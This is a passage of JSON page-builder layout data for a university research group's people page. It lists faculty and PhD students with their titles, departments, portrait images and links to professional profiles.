Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 